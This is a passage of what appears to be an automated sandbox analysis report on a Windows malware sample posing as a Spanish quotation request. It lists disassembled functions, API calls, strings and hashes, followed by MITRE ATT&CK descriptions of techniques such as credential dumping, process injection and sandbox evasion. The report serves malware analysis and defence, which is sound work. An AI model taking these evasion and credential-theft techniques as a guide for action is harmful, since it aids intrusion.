GetSysColor.USER32(00000012), ref: 00293794

Strings

static, xrefs: 00293757

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 2d507f0a842ee9ecbb648ff3fbe24e2403a143f00a7ffe3c795003c13f2422b6
Instruction ID: 1df6d20489f5f5790e12f85ecf10ade8f9cdeb8f753b020459ffe34109de7573
Opcode Fuzzy Hash: 2d507f0a842ee9ecbb648ff3fbe24e2403a143f00a7ffe3c795003c13f2422b6
Instruction Fuzzy Hash: 98113AB262020AAFDF00DFA8CC49EEA7BB8FB09314F104915F955E2250D775E8619B50

Function 0027CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0027CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0027CDA6

Strings

<local>, xrefs: 0027CD66

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c456674a53553facbfa050e77e1911028e9deca8e7e27ec82966527b660be12c
Instruction ID: a92a30c81f3fdac0f3a425f6ee19097c1b30ba9745ed2c856674f32a498cceeb
Opcode Fuzzy Hash: c456674a53553facbfa050e77e1911028e9deca8e7e27ec82966527b660be12c
Instruction Fuzzy Hash: 9911A771125632BAD7384A769C49FE7BE5CEB167A4F20823EB10D82180D6749850D6F0

Function 00293429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002934AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002934BA

Strings

edit, xrefs: 0029348F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 3d01560a73055ebe994f0813b28dee28f481eec32e731134ee87673545bf3b7a
Instruction ID: 9469c986c37651be9db2b54a88f66b86219e535fe50a07f041cd588657aced63
Opcode Fuzzy Hash: 3d01560a73055ebe994f0813b28dee28f481eec32e731134ee87673545bf3b7a
Instruction Fuzzy Hash: 30118C71120209ABEF128F64EC48ABB37AAEF05378F615724F965931E0C771EC619B60

Function 00266C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

CharUpperBuffW.USER32(?,?,?), ref: 00266CB6
_wcslen.LIBCMT ref: 00266CC2

Strings

STOP, xrefs: 00266CBC, 00266CC1

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: d00f7e54a5b5875ae2c57c7ca5882d811b30dfa567d84c5319bc9b3d2c7a51cb
Instruction ID: 6d4f61e257e52c88b701ef96aba7109a003ccaf5fb4784f43b46a1ba0f5385f0
Opcode Fuzzy Hash: d00f7e54a5b5875ae2c57c7ca5882d811b30dfa567d84c5319bc9b3d2c7a51cb
Instruction Fuzzy Hash: 590108326309278ACB109FFDDC489BF73B4EE61710F100529E452921D1EA31D8A0C650

Function 00261BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

Part of subcall function 00263CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00263CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00261C46

Strings

ListBox, xrefs: 00261C10
ComboBox, xrefs: 00261BE5

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c06b287d358ce262ea6ffff28294be73b691de96469b027e6ebb84f678828ecd
Instruction ID: caa5814eaf462ad81bb360c61ee264239e29298dd6750c3f0899ece3ed418784
Opcode Fuzzy Hash: c06b287d358ce262ea6ffff28294be73b691de96469b027e6ebb84f678828ecd
Instruction Fuzzy Hash: 3001FC71A6020466CB04EB90C951EFF77A89F15340F14001BF406632C3EA20AEB88AB2

Function 0021A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0021A529

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

Strings

3y%, xrefs: 0021A545, 0021A54D, 0021A552
,%-, xrefs: 0021A509

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%-$3y%
API String ID: 2551934079-1204127486
Opcode ID: d0c6f6df1116137e5746284799ddc45811b4ba0f588887c861338cd18a4103dc
Instruction ID: 1c88e8281cc475c0e2aa66238f99820bdd904744b2e16613594962050b017652
Opcode Fuzzy Hash: d0c6f6df1116137e5746284799ddc45811b4ba0f588887c861338cd18a4103dc
Instruction Fuzzy Hash: 59014731F32210A7CA04F768B84BA9D33A58B15720F904015F502172C3DE605DA58E97

Function 00298172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002D3018,002D305C), ref: 002981BF
CloseHandle.KERNEL32 ref: 002981D1

Strings

\0-, xrefs: 0029818A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0-
API String ID: 3712363035-8283200
Opcode ID: 01389fe57e023752b04404ebc534b0c81de3b48231507831ea479b4138ea72eb
Instruction ID: c4549b104426277149361aa72bd687e89d8575d342fbd9a18f14c22755937189
Opcode Fuzzy Hash: 01389fe57e023752b04404ebc534b0c81de3b48231507831ea479b4138ea72eb
Instruction Fuzzy Hash: 48F05EB2A51310BBE320AB61FC49FB73B5CDB05752F000462BB08D51A2D6768E2487BA

Function 0028747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00287493
_wcslen.LIBCMT ref: 002874B9

Strings

3, 3, 16, 1, xrefs: 00287483

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: d1e8342c7b8b29e48082fba445ff70de1eacaacc9ff37c778ec82cb5f0d5f16b
Instruction ID: d0f4a570578ec79737ae4fa9d8e7918790fa8f06a220c15e5b3f1a882f80ce2e
Opcode Fuzzy Hash: d1e8342c7b8b29e48082fba445ff70de1eacaacc9ff37c778ec82cb5f0d5f16b
Instruction Fuzzy Hash: 90E02B0A23627120923136B9ACC1A7F5699DFC5750734182BF985C22A6EAD4CDF193A0

Function 00260B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00260B23

Strings

AutoIt, xrefs: 00260B17
Error allocating memory., xrefs: 00260B1C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 3c30ada07792863ec27f9abc205c2d0560714bf2797f3b092ed46f045e9236a0
Instruction ID: 4967745fe8ad30d3c8b867ca185072c354d51c192cde139cb312976a2070a257
Opcode Fuzzy Hash: 3c30ada07792863ec27f9abc205c2d0560714bf2797f3b092ed46f045e9236a0
Instruction Fuzzy Hash: 73E0D83126431836D6143B947C07FD97AC48F05B20F20042BF758594C38AE164F00AE9

Function 00220D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0021F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00220D71,?,?,?,0020100A), ref: 0021F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0020100A), ref: 00220D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0020100A), ref: 00220D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00220D7F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 431ef983b9237b80ed5075ebf593f08192979babac6e2e18ae5d20d942eb5a56
Instruction ID: 5035213a992191e0deb8f9d802a725d3ff47a4364a7d247755243894615987b2
Opcode Fuzzy Hash: 431ef983b9237b80ed5075ebf593f08192979babac6e2e18ae5d20d942eb5a56
Instruction Fuzzy Hash: A8E092706113119BE7B09FF8F5487427BE0EF00740F00492EE886C6656DBB0E4548F91

Function 0021E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0021E3D5

Strings

0%-, xrefs: 0021E3B5
8%-, xrefs: 0021E3CA

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%-$8%-
API String ID: 1385522511-4080731599
Opcode ID: dcdc1834639fcb1b2a35e3b5e1705d12fdc13423c46230e8b45275c7cb6ca139
Instruction ID: 1a8ca7b6fd97f4ff07864cbdc6a61ca26e165344e83661b409d96bab988f8ac7
Opcode Fuzzy Hash: dcdc1834639fcb1b2a35e3b5e1705d12fdc13423c46230e8b45275c7cb6ca139
Instruction Fuzzy Hash: B7E02031831920CBCE0C9758BE9CDDC3391BB343207D102E7F862871D19B301CA58954

Function 0025D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0025D220

Strings

X64, xrefs: 0025D2A8
%.3d, xrefs: 0025D22B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 8a793c1add53c46158b806162ca752cfdde3bb9a462cdf76ae3984c0dd261f95
Instruction ID: 1017843061afbe1f380568bd68bc53b2fae006171860eb3fdeced72f99a12d7d
Opcode Fuzzy Hash: 8a793c1add53c46158b806162ca752cfdde3bb9a462cdf76ae3984c0dd261f95
Instruction Fuzzy Hash: 3DD01271C3C108EACBA097D0DC499FAB3BCAB18302F608456FC06D2041D6B4D56CAB65

Function 00292322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0029232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0029233F

Part of subcall function 0026E97B: Sleep.KERNEL32 ref: 0026E9F3

Strings

Shell_TrayWnd, xrefs: 00292325

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2d814dd03a705483d996d183d1b1ef62c0304f582a558e5cf60d6e9d003913fc
Instruction ID: 03b27780f0aceb36338ecbe91bbf885a38c7be07847ba7182262473f076576a5
Opcode Fuzzy Hash: 2d814dd03a705483d996d183d1b1ef62c0304f582a558e5cf60d6e9d003913fc
Instruction Fuzzy Hash: 40D012763E5310B7EA68B770EC4FFC6BA289F40B10F114E177749AA1D4C9F0A855CA54

Function 00292356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0029236C
PostMessageW.USER32(00000000), ref: 00292373

Part of subcall function 0026E97B: Sleep.KERNEL32 ref: 0026E9F3

Strings

Shell_TrayWnd, xrefs: 00292365

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b68f2975503ebf7b03a16dbec5a5b22d00ffa7ac83753d10f3ff04f8e37b6436
Instruction ID: b9086f38f455c62ddab6361448c4858a52e5a6a1cf372da7c7d6388fdd7aa7d4
Opcode Fuzzy Hash: b68f2975503ebf7b03a16dbec5a5b22d00ffa7ac83753d10f3ff04f8e37b6436
Instruction Fuzzy Hash: F5D0A9323D13007AEA68A330EC0FFC6A6289B00B00F110A167205AA0D0C8A0A8108A04

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

